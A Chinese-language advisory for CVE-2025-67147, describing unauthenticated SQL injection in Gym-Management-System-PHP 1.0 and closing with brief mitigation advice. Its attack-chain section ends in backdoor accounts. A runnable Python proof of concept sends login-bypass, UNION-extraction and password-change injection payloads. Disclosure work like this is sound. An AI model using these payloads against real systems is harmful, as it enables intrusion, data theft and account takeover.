CVE-2025-67147: Gym-Management-System-PHP SQL注入漏洞（严重）

漏洞信息

漏洞编号

CVE-2025-67147

漏洞类型

SQL注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

amansuryawanshi Gym-Management-System-PHP 1.0

漏洞概述

Gym-Management-System-PHP 1.0版本存在多个SQL注入漏洞，攻击者可通过未过滤的用户输入在多个关键文件中执行任意SQL命令。该系统是一款使用PHP开发的健身房管理系统，漏洞影响submit_contact.php、secure_login.php和change_s_pwd.php三个文件中的多个参数。攻击者无需认证即可利用部分漏洞，成功利用后可绕过身份验证、执行任意SQL命令、修改数据库记录、删除数据或将权限提升至管理员级别。由于CVSS评分高达9.8，该漏洞属于严重级别，对使用该系统的健身房构成重大安全威胁。

技术细节

该漏洞源于应用程序未对用户输入进行充分的参数化查询或输入验证。在submit_contact.php文件中，'name'、'email'和'comment'参数直接拼接到SQL查询中；在secure_login.php文件中，'username'和'pass_key'参数存在相同问题；在change_s_pwd.php文件中，'login_id'、'pwfield'和'login_key'参数也未进行安全处理。攻击者可通过构造恶意SQL payloads（如' OR '1'='1、UNION SELECT等）来利用这些漏洞。在登录相关文件中，攻击者可利用SQL注入绕过认证获取管理员权限；在联系表单中，攻击者可提取数据库中的敏感信息。攻击成功后，攻击者可以完全控制整个系统，包括用户数据、财务数据等敏感信息。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标网站使用的Gym-Management-System-PHP版本，确定漏洞文件位置

STEP 2

步骤2

构造Payload：攻击者根据目标文件构造恶意SQL注入 payloads，如' OR '1'='1 或 UNION SELECT 语句

STEP 3

步骤3

认证绕过：利用secure_login.php的SQL注入漏洞，发送恶意构造的登录请求绕过身份验证

STEP 4

步骤4

数据提取：利用submit_contact.php或change_s_pwd.php的漏洞，通过UNION注入提取数据库中的用户信息、密码哈希等敏感数据

STEP 5

步骤5

权限提升：使用获取的凭证登录系统或直接修改数据库中的用户角色，将权限提升至管理员级别

STEP 6

步骤6

持久化控制：创建后门账户或修改现有账户，确保长期访问权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

''' CVE-2025-67147 SQL Injection PoC Target: Gym-Management-System-PHP 1.0 Vulnerable Files: submit_contact.php, secure_login.php, change_s_pwd.php ''' import requests import sys TARGET = "http://target.com/gym-system/" # PoC 1: Authentication Bypass in secure_login.php def bypass_auth(): """Bypass login authentication using SQL injection""" endpoint = f"{TARGET}secure_login.php" payload = { "username": "admin' OR '1'='1' --", "pass_key": "any" } print("[+] Attempting authentication bypass...") response = requests.post(endpoint, data=payload) if "dashboard" in response.text.lower() or response.status_code == 302: print("[+] Authentication bypass successful!") return response # PoC 2: SQL Injection in submit_contact.php def inject_contact_form(): """Extract database information via contact form""" endpoint = f"{TARGET}submit_contact.php" # UNION-based injection to extract data payload = { "name": "test' UNION SELECT 1,2,version(),user(),5,6 -- ", "email": "[email protected]", "comment": "test" } print("[+] Sending SQL injection payload to contact form...") response = requests.post(endpoint, data=payload) print(f"[+] Response Status: {response.status_code}") return response # PoC 3: SQL Injection in change_s_pwd.php def inject_password_change(): """Modify user passwords via SQL injection""" endpoint = f"{TARGET}change_s_pwd.php" payload = { "login_id": "1' OR '1'='1", "pwfield": "newpassword", "login_key": "123" } print("[+] Attempting password change injection...") response = requests.post(endpoint, data=payload) return response if __name__ == "__main__": print("=" * 50) print("CVE-2025-67147 SQL Injection PoC") print("=" * 50) try: bypass_auth() inject_contact_form() inject_password_change() except Exception as e: print(f"[-] Error: {e}")

影响范围

Gym-Management-System-PHP 1.0

防御指南

临时缓解措施

立即停止使用存在漏洞的Gym-Management-System-PHP 1.0版本，或在相关PHP文件中的SQL查询前添加输入过滤和参数化查询代码。在厂商发布修复补丁之前，可通过配置Web应用防火墙规则临时阻断针对这些参数的SQL注入攻击请求，同时加强对系统访问日志的监控，及时发现异常访问行为。